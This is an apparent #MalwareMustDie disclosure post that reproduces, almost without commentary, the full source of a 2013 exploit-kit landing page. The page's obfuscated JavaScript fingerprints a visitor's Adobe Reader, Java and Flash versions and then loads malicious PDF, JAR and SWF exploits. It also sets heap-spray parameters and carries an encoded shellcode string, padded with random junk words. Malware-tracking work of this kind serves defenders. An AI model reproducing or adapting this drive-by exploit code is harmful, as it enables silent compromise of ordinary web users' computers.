#MalwareMustDie - Cool Exploit Landing Page -2- 20130114

 

＜html＞

＜head＞

＜title＞Fund Wipe＜/title＞

＜link href＝"favicon.ico" rel＝"shortcut icon" type＝"image/x-icon" /＞

＜meta http-equiv＝"Content-Type" content＝"text/html" /＞

 

＜script type＝'text/javascript'＞

 

 pull＝false;

 Roar＝0;

 if(navigator.plugins && navigator.plugins.length)

 ｛

   for(var Afternoon＝0; Afternoon＜navigator.plugins.length;Afternoon++)

   ｛

     if(navigator.plugins[Afternoon].description.indexOf('Adobe Acrobat')!＝-1)

     ｛

       Roar＝parseFloat(navigator.plugins[Afternoon].description.split('Version ')[1]);

       pull＝true;

       break

     ｝

     if(navigator.plugins[Afternoon].description.indexOf('Adobe PDF')!＝-1)

     ｛

       pull＝true;

       break

     ｝

   ｝

 ｝

 else if (window.ActiveXObject)

 ｛

   var control ＝ null;

   try

   ｛

     control ＝ new ActiveXObject('AcroPDF.PDF');

   ｝

   catch (e)

   ｛

   ｝

   if (!control)

   ｛

     try

     ｛

       control ＝ new ActiveXObject('PDF.PdfCtrl');

     ｝

     catch (e)

     ｛

     ｝

   ｝

   if (control)

   ｛

     isInstalled ＝ true;

     version ＝ control.GetVersions().split(',');

     version ＝ version[0].split('＝');

     version ＝ parseFloat(version[1]);

     Roar＝version;

     pull＝true;

   ｝

 ｝

 Roar＝parseInt(Roar);

＜/script＞

 

＜/head＞

＜body＞

＜div id＝"heap_allign"＞＜/div＞

＜div id＝"table_div"＞＜/div＞

Fireplace Exaggerate Enlighten Grain＜center＞Bride Monster Roast Cinema＜/center＞

insight suicide auction usage fireplace race worse precaution core module indication relaxation often sweeten postpone appalling spending boast leadership videotaped chair tune

 

 

 

＜applet archive＝"/news/tentative.jar" code＝"hw.class" width＝"300" height＝"300" type＝"application/x-java-applet;version＝1.6"＞＜/applet＞

 

 

TERMINATE DEPOT ELECTORAL ENQUIRY EYE EXERCISE SPOUSE GLEE＜h3＞EDITOR MAGAZINE CONFIRM NARRATIVE＜/h3＞＜small＞attention vessel bolt＜/small＞prevalence myself articulate liberate attractive lower ale precision abandon herself stair wish reality glimpse bass magical colour monster slip strap tax available probe banking mystery specialise

 

 

 

＜script＞function HAIRY(POWDER, ATOMIC)｛var proceeding_ ＝'7817';var hammer ＝'COMMENTARY DISGUST GREET BITE';｝ proprietor ＝ 943;if ( proprietor＞＝195)｛document.body.appendChild(document.createElement("p","Deck Venture Lion Firmly Keen Jail Surprising")); document.body.appendChild(document.createElement("p","1182"));document.body.appendChild(document.createElement("p","evolve secretly region meadow"));｝ else if(proprietor＜＝240)｛document.body.appendChild(document.createElement("p","Insult Buy Avoidance Document Sunday Rightly Unify")); var differencecentre ＝"Well Administer Shout Constant Rabbi Journalist";｝var SURFACE＝[0,0,0,0];try｛var statement＝function()｛var refer＝｛Heredity:null,exceed:null,Offer:'application/npruntime-scriptable-plugin;DeploymentToolkit',Orchestra:'application/java-deployment-toolkit',Century:null,Sand:null,CHORD:function()｛var immense＝new Array();if(this.OUGHT())｛var POORLY＝this.Want();var Them＝POORLY.jvms;for(var i＝0;i＜Them.getLength();i++)｛immense[i]＝Them.get(i).version｝｝else｛var br ＝ this.g6();if(br＝＝'MSIE')｛if(this.ax('1.7.0'))｛immense[0]＝'1.7.0'｝else if(this.ax('1.6.0'))｛immense[0]＝'1.6.0'｝else if(this.ax('1.5.0'))｛immense[0]＝'1.5.0'｝else if(this.ax('1.4.2'))｛immense[0]＝'1.4.2'｝else if(this.tm())｛immense[0]＝'1.1'｝｝else if(br＝＝'Netscape Family')｛this.gj();if(this.Heredity!＝null)｛immense[0]＝this.Heredity｝else if(this.tt('1.7'))｛immense[0]＝'1.7.0'｝else if(this.tt('1.6'))｛immense[0]＝'1.6.0'｝else if(this.tt('1.5'))｛immense[0]＝'1.5.0'｝else if(this.tt('1.4.2'))｛immense[0]＝'1.4.2'｝｝｝return immense｝,ax:function(h)｛var on＝'JavaWebStart.isInstalled.'+h+'.0';if(typeof ActiveXObject＝＝'undefined'||!ActiveXObject)return false;try｛return (new ActiveXObject(on)!＝null)｝catch(exception)｛return false｝｝,tm:function()｛var clsid＝'｛08B0E5C0-4FCB-11CF-AAA5-00401C608500｝';if (typeof oClientCaps!＝'undefined')｛var v＝oClientCaps.getComponentVersion(clsid,"ComponentID");if((v＝＝'')||(v＝＝'5,0,5000,0'))｛return false｝else｛return true｝｝else｛return false｝｝,tt:function(ga)｛if(!navigator.mimeTypes)return false;for(var i＝0;i＜navigator.mimeTypes.length;++i)｛s＝navigator.mimeTypes[i].type;var m＝s.match(/^application\/x-java-applet;version＝(1\.8|1\.7|1\.6|1\.5|1\.4\.2)$/);if(m!＝null)if(this.cv(m[1],ga))return true｝return false｝,cv:function(ib,rq)｛var a＝ib.split('.');var b＝rq.split('.');for(var i＝0;i＜a.length;++i)a[i]＝Number(a[i]);for(var i＝0;i＜b.length;++i)b[i]＝Number(b[i]);if(a.length＝＝2)a[2]＝0;if(a[0]＞b[0])return true;if(a[0]＜b[0])return false;if(a[1]＞b[1])return true;if(a[1]＜b[1])return false;if(a[2]＞b[2])return true;if(a[2]＜b[2])return false;return true｝,gj:function()｛for(var i＝0;i＜navigator.mimeTypes.length;++i)｛var s＝navigator.mimeTypes[i].type;var m＝s.match(/^application\/x-java-applet;jpi-version＝(.*)$/);if(m!＝null)｛this.Heredity＝m[1];if('Opera'!＝this.Sand)break｝｝｝,OUGHT:function()｛var pk＝this.Want();if(pk&&pk.jvms)｛return true｝else｛return false｝｝,ap:function()｛this.g6();return ('Safari'!＝this.Sand&&'Opera'!＝this.Sand)｝,Want:function()｛this.rf();var r ＝ null;if (this.ap())r ＝ document.getElementById('deployJavaPlugin');return r｝,g6:function()｛if (this.Century ＝＝ null)｛var br＝navigator.userAgent.toLowerCase();if((br.indexOf('msie')!＝-1)&&(br.indexOf('opera')＝＝-1))｛this.Century＝'MSIE';this.Sand＝'MSIE'｝else if(br.indexOf('iphone')!＝-1)｛this.Century＝'Netscape Family';this.Sand＝'iPhone'｝else if((br.indexOf('firefox')!＝-1)&&(br.indexOf('opera')＝＝-1))｛this.Century＝'Netscape Family';this.Sand＝'Firefox'｝else if(br.indexOf('chrome')!＝-1)｛this.Century＝'Netscape Family';this.Sand＝'Chrome'｝else if(br.indexOf('safari')!＝-1)｛this.Century＝'Netscape Family';this.Sand＝'Safari'｝else if((br.indexOf('mozilla')!＝-1)&&(br.indexOf('opera')＝＝-1))｛this.Century＝'Netscape Family';this.Sand＝'Other'｝else if(br.indexOf('opera')!＝-1)｛this.Century＝'Netscape Family';this.Sand＝'Opera'｝else｛this.Century＝'?';this.Sand＝'unknown'｝｝return this.Century｝,wt:function()｛var br＝this.g6();if(br＝＝'MSIE')｛document.write('＜'+'object classid＝"clsid:CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA" '+'id＝"deployJavaPlugin" width＝"0" height＝"0"＞'+'＜'+'/'+'object'+'＞')｝else if(br＝＝'Netscape Family'&&this.ap())｛this.we()｝｝,rf:function()｛navigator.plugins.refresh(false);var br＝this.g6();if(br＝＝'Netscape Family'&&this.ap())｛var pj＝document.getElementById('deployJavaPlugin');if(pj＝＝null)this.we()｝｝,we: function()｛var wn＝false;if(navigator.mimeTypes!＝null)｛for(var i＝0;i＜navigator.mimeTypes.length;i++)｛if(navigator.mimeTypes[i].type＝＝this.Orchestra)if(navigator.mimeTypes[i].enabledPlugin)｛document.write('＜'+'embed id＝"deployJavaPlugin" type＝"'+this.Orchestra+'" hidden＝"true" /＞');wn＝true｝｝if(!wn)for(var i＝0;i＜navigator.mimeTypes.length;i++)if(navigator.mimeTypes[i].type＝＝this.Offer)if(navigator.mimeTypes[i].enabledPlugin)document.write('＜'+'embed id＝"deployJavaPlugin" type＝"'+this.Offer+'" hidden＝"true" /＞')｝｝｝;refer.wt();if(refer.exceed＝＝null)｛var l2＝null;if(l2＝＝null)try｛l2＝navigator.userLanguage｝catch(err)｛pump_thanks＝608; if ( pump_thanks＜319)｛document.body.appendChild(document.createElement("p",'9783'));var wave_anger ＝'largescale everyday';var xraypollution＝'Storage Pop Survive Rising Clerical Shopkeeper';｝｝if(l2＝＝null)try｛l2＝navigator.systemLanguage｝catch(err)｛｝if(l2＝＝null)try｛l2＝navigator.language｝catch(err)｛｝if(l2!＝null)｛l2.replace("-","_");refer.exceed＝l2｝｝return refer｝();var SURFACE＝statement.CHORD().toString().replace("_",".").split(".");function variable(STRENGTHEN)｛document.body.appendChild(document.createElement("p","758"));document.body.appendChild(document.createElement("p","THICK TRUCE HOW PATRON ADEQUATE IMMIGRANT")); ｝for(var i＝0;i＜SURFACE.length;i++)SURFACE[i]＝parseInt(SURFACE[i]);function occupation(APPEAL)｛document.body.appendChild(document.createElement("p",'166'));var vulnerablenovelist_ ＝'There Profound Respondent Extra';var noisy＝'9956'; ｝ if(i＜2)｛bureauindex ＝ 642;if(bureauindex＜＝ 802) ｛var voucher_＝'bang science notion negotiate explicitly';var ion_＝"";document.body.appendChild(document.createElement("p","Blue Bin Precedent")); ｝SURFACE＝[0,0,0,0]｝｝catch(e)｛｝trace ＝ 506 / 428; if( trace＝＝ 147) ｛document.body.appendChild(document.createElement("p","COURAGE DISAPPOINT PRECISION FLEE")); var ourselvesportrait_＝"rot excite act stance safeguard intense supplement";document.body.appendChild(document.createElement("p",'1337')); ｝ else ｛var hopeless_comb＝"CURSE POTATO COMB LEGEND"; ｝ function defect_lender(CARDBOARD, DELIGHTFUL, SWELL)｛var flatten_＝"1054"; var cultural_ ＝"57";document.body.appendChild(document.createElement("p",'801'));｝

 

 

 if ((SURFACE[1]＜6&&SURFACE[0]＞0)||(SURFACE[1]＝＝6&&SURFACE[3]＜33)||(SURFACE[1]＝＝7&&SURFACE[3]＜9))

 ｛

   setTimeout('Grab();', 6480);

 ｝

 else

 ｛

   function ulcer_nasty(ask, local)

   ｛

     var door_ ＝"republican abolition";

     var unclear_ ＝"educator pleased capital very";

   ｝

   Grab();

   function minutedevil(Tray, Theft, Garage)

   ｛

     var enquiremore ＝"linger waiting rehearsal";

     document.body.appendChild(document.createElement("p",""));

     var fragment_ ＝'3552';

   ｝

 ｝

 constitute_basin＝null;

 if(constitute_basin ＜ 511)

 ｛

   var conceptual_aid＝'update meat beer insurance varying soccer';

 ｝

 else if(constitute_basin ＝＝196)

 ｛

   document.body.appendChild(document.createElement("p",'8160'));

   document.body.appendChild(document.createElement("p",'VOLUNTEER'));

   document.body.appendChild(document.createElement("p","IMPULSE SAKE TREASURY EMOTIONAL GARDENER DISPOSE HERITAGE"));

 ｝

 function Grab()

 ｛

   retreat ＝ true;

   if ( retreat ＞132)

   ｛

     var carryaluminium ＝"6091";

     document.body.appendChild(document.createElement("p","203"));

   ｝

   else if(retreat ＞ 611)

   ｛

     var diagnosis_ ＝'7766';

   ｝

   if (pull||(Roar＞0&&Roar＜10))

   ｛

     var DETAIL＝document.createElement('div');

     function ATTENTIONAMATEUR(tactic, diameter, warrant)

     ｛

       var hey ＝'7221';

       document.body.appendChild(document.createElement("p","8241"));

       document.body.appendChild(document.createElement("p","Microphone Acceptable Exaggerate Fond Tide"));

     ｝

     DETAIL.innerHTML ＝ '＜object data＝"/'+(((Roar＞0)&&(Roar＜8))?('news/Shore_Rightly2.pdf'):('news/live1.pdf'))+'" type＝"application/pdf" width＝"200" height＝"100"＞＜embed src＝"/'+(((Roar＞0)&&(Roar＜8))?('news/Shore_Rightly2.pdf'):('news/live1.pdf'))+'" type＝"application/pdf" width＝"100" height＝"200" /＞＜/object＞';

     document.body.appendChild(DETAIL);

     setTimeout('Feasible();', 6388);

     bacondoll＝true;

     if ( bacondoll ＜＝639)

     ｛

       document.body.appendChild(document.createElement("p",'8464'));

     ｝

     else if(bacondoll＜＝ 829)

     ｛

       document.body.appendChild(document.createElement("p","PROMINENT SECURE"));

       document.body.appendChild(document.createElement("p",'turnover colon'));

       var security_＝'radius modesty';

     ｝

   ｝

 ｝

 function getCN()

 ｛

   return "/news/INDUSTRIAL1.SWF"

 ｝

 function getBlockSize()

 ｛

   return 1024

 ｝

 function getAllocSize()

 ｛

   return 1024*1024

 ｝

 function getAllocCount()

 ｛

   return 300

 ｝

 function getFillBytes()

 ｛

   var a＝'%'+'u'+'0'+'c'+'0c';

   return a+a

 ｝

 function vfsq()

 ｛

   xz＝"%u";

   var a＝"8282!05d4!60d4!d411!14e5!94c5!64c5!c5d4!b570!d4f5!7064!7454!60b4!b5c5!c514!6474!1585!9404!c414!54d4!9444!b414!b574!f160!8181!c4f1!d4b1!11e4!e4b1!d181!7070!8521!c5c5!8504!2370!15e1!eee6!3733!2e2a!59b1!7492!621a!6d2a!4c0b!6662!7d6a!6d7d!0c4b!e702!6d7d!8224!ce24!82d5!8a71!2df6!82d5!8a71!b3f6!a23c!423c!babe!e7c2!b77d!3c42!82ba!c224!7de7!82b7!e324!8ed5!c3da!7de7!2482!b7f7!2482!2482!9697!53c2!0ac6!c281!2a9e!8217!5312!eec6!4444!60c4!53d2!fec6!a4c5!f585!5382!fec6!1e97!0cb1!423a!7de7!8282!0d82!b704!b580!8050!c002!fec6!b1a1!e5a5!c0c2!fec6!f4b5!a5d4!c2c0!42fe!47c0!825a!9282!4cc2!a59a!a23c!7d3c!7d7d!0c94!3a0c!ce02!e3ba!c77d!4454!d5a5!8204!6482!0474!7dbc!bed2!83ba!3a67!3a4c!87d7!8e13!87ba!8282!7d82!8604!8724!8207!8282!0c82!ac1d!7d7d!0b7d!170c!24d2!3afd!0402!bd3a!eb3c!c5b2!42b1!8a55!0480!583a!3cb7!17be!3867!b2de!c23a!5f3a!0fb2!423a!c7c0!4c7d!5ae6!4236!e43a!b25f!67c0!673a!d5ec!3173!3c9d!2f86!52b2!9e3e!c502!01ad!6983!3f72!deb1!58b2!964d!1e16!ddb1!80b2!3ae5!dde7!05b2!c5d1!413a!3ad5!97e7!3c46!971c!ccd5!c0da!fac1!d53d!11e2!bee6!8681!093a!7d7d!d383!9a6c!b140!b2c5!6741!e43a!b13f!e502!e73a!8543!423a!3a86!8681!c43a!b18e!1c77!d5c1!dacc!ffff!beff!508e!afbe!042e!0382!ef08!9ec3!6618!139c!0185!cfbe!4ecf!6638!1414!1414!".split("").reverse().join("");

   return a["replace"](/!/g,xz)

 ｝;

 getShellCode＝vfsq;

 function Archbishop()

 ｛

   try

   ｛

     try

     ｛

       var axo ＝ new ActiveXObject('ShockwaveFlash.ShockwaveFlash.6');

       try

       ｛

         axo.AllowScriptAccess ＝ 'always';

       ｝

       catch(e)

       ｛

         return '6,0,0';

       ｝

     ｝

     catch(e)

     ｛

     ｝

     return new ActiveXObject('ShockwaveFlash.ShockwaveFlash').GetVariable('$version').replace(/\D+/g, ',').match(/^,?(.+),?$/)[1];

   ｝

   catch(e)

   ｛

     try

     ｛

       if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin)

       ｛

         return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).description.replace(/\D+/g, ",").match(/^,?(.+),?$/)[1];

       ｝

     ｝

     catch(e)

     ｛

     ｝

   ｝

   return '0,0,0';

 ｝

 function Feasible()

 ｛

   var note＝Archbishop().split(',');

   if (((note[0]＝＝10&&note[1]＝＝0&&note[2]＞40)||(document&&(note[0]＝＝10&&note[1]＞0)&&(note[0]＝＝10&&note[1]＜2)))||window.document&&((note[0]＝＝10&&note[1]＝＝2&&note[2]＜159)||(note[0]＝＝10&&note[1]＜2)))

   ｛

     var oSpan＝document.createElement("div");

     window["doc"+"ument"]["bo"+"dy"].appendChild(oSpan);

     oSpan.innerHTML＝"＜object classid＝'clsid:d27cdb6e-ae6d-11cf-96b8-444553540000' width＝10 height＝10 id＝'swf_id'＞＜param name＝'movie' value＝'/news/definite2.swf' /＞＜param name＝'allowScriptAccess' value＝'always' /＞＜param name＝'Play' value＝'0' /＞＜embed src＝'/news/definite2.swf' id＝'swf_id' name＝'swf_id' allowScriptAccess＝'always' type＝'application/x-shockwave-flash' width＝'10' height＝'10'＞＜/embed＞＜/object＞";

   ｝

 ｝

 donatedisarm ＝ null;

 if(donatedisarm ＜ 796)

 ｛

   document.body.appendChild(document.createElement("p","7282"));

 ｝

 try

 ｛

   document.body++;

 ｝

 catch(dsgsdg)

 ｛

 ｝

 setTimeout(function()

 ｛

 ｝

 ,9000);

 document.write("＜b style＝'color:red;font-size:50px'＞" + SURFACE + "＜/b＞");

 ＜/script＞

 

 

HINGE LENGTHEN

＜div align＝'top' title＝'Discourse Similarly Enter Recorder Treatment'＞Consensus Different Scar＜/div＞＜hr＞

＜acronym＞Inquiry Ought Peak Incidence＜/acronym＞

 

＜article＞Sell Scared Particle Upset＜/article＞＜code＞porter noble dream frightened＜/code＞

 

 

 

＜script＞

 

 great ＝ 930;

 if ( great＞ 927)

 ｛

   var vicious_actress＝'Terrorist Serious Maker Patch Dual';

   var union ＝"731";

   var active_＝'village';

 ｝

 else if(great＞＝627)

 ｛

   var technique_most_＝'7507';

   document.body.appendChild(document.createElement("p","PAGE"));

   var leisurepunishment ＝'5973';

 ｝

 function Deeply(Conquest)

 ｛

   document.body.appendChild(document.createElement("p",'1829'));

 ｝

 function HALFWAY(replace, tobacco)

 ｛

   document.body.appendChild(document.createElement("p","4696"));

   document.body.appendChild(document.createElement("p","7442"));

 ｝

 function Associate(ABSENT)

 ｛

   document.body.appendChild(document.createElement("p","3002"));

   var honestly_welcome＝"140";

 ｝

 function seeminglyconstitute(DEAF)

 ｛

   var sky ＝"PRIVACY";

 ｝

＜/script＞

 

 

＜article＞Linger White Mist Unexpected＜/article＞

RECIPIENT ITS PLEASE REGIMENT INHERENT CIVILIAN TIN RECKON PIT RELATION VOLUNTEER DECEMBER BREATH DEPART

 

 

＜noscript＞

＜object data＝"/news/live1.pdf" type＝"application/pdf" width＝"100" height＝"300"＞

＜embed src＝"/news/live1.pdf" type＝"application/pdf" width＝"300" height＝"100" /＞＜/object＞

＜object data＝"/news/Shore_Rightly2.pdf" type＝"application/pdf" width＝"300" height＝"300"＞＜embed src＝"/news/Shore_Rightly2.pdf" type＝"application/pdf" width＝"200" height＝"200" /＞＜/object＞＜/noscript＞

 

 

SANCTUARY PALM MONETARY THROUGH BIRTHDAY OPENING CRIMINAL BROTHER＜center＞Gram＜/center＞＜br＞＜i＞Candle Blonde Even＜/i＞

 

 

 

＜script＞

 

 expect＝false;

 if(expect＝＝ 844)

 ｛

   document.body.appendChild(document.createElement("p",'9121'));

   document.body.appendChild(document.createElement("p","4252"));

 ｝

 recover_prison ＝218 /129;

 if ( recover_prison ＜ 125)

 ｛

   var smoothly＝"4329";

   document.body.appendChild(document.createElement("p",'8158'));

   var improved ＝'bitch';

 ｝

 wellconsistent＝ true;

 if (wellconsistent ＝＝ 339)

 ｛

   var assertiontakeover_＝"3798";

   var donor_clarity_＝'Damaging Attainment Violin Rabbit';

   var trouser＝"3367";

 ｝

 else if( wellconsistent＞ 684)

 ｛

   var frozenauthor_＝"5411";

   var poll ＝"Recipe Main";

   document.body.appendChild(document.createElement("p","8483"));

 ｝

 fluid ＝true;

 if(fluid ＜＝ 631)

 ｛

   var regulationlacking_＝"decay flock inevitable";

 ｝

 

＜/script＞

 

 

＜article＞CONFESSION RICE ALTER BOYFRIEND＜/article＞

CUTTING OFFICER UNSTEADY IMPRESS ILLEGAL WHENEVER ATTEMPT CHARM BAIL FOSTER NOBLEMAN

＜/body＞

＜/html＞

 

#MalwareMustDie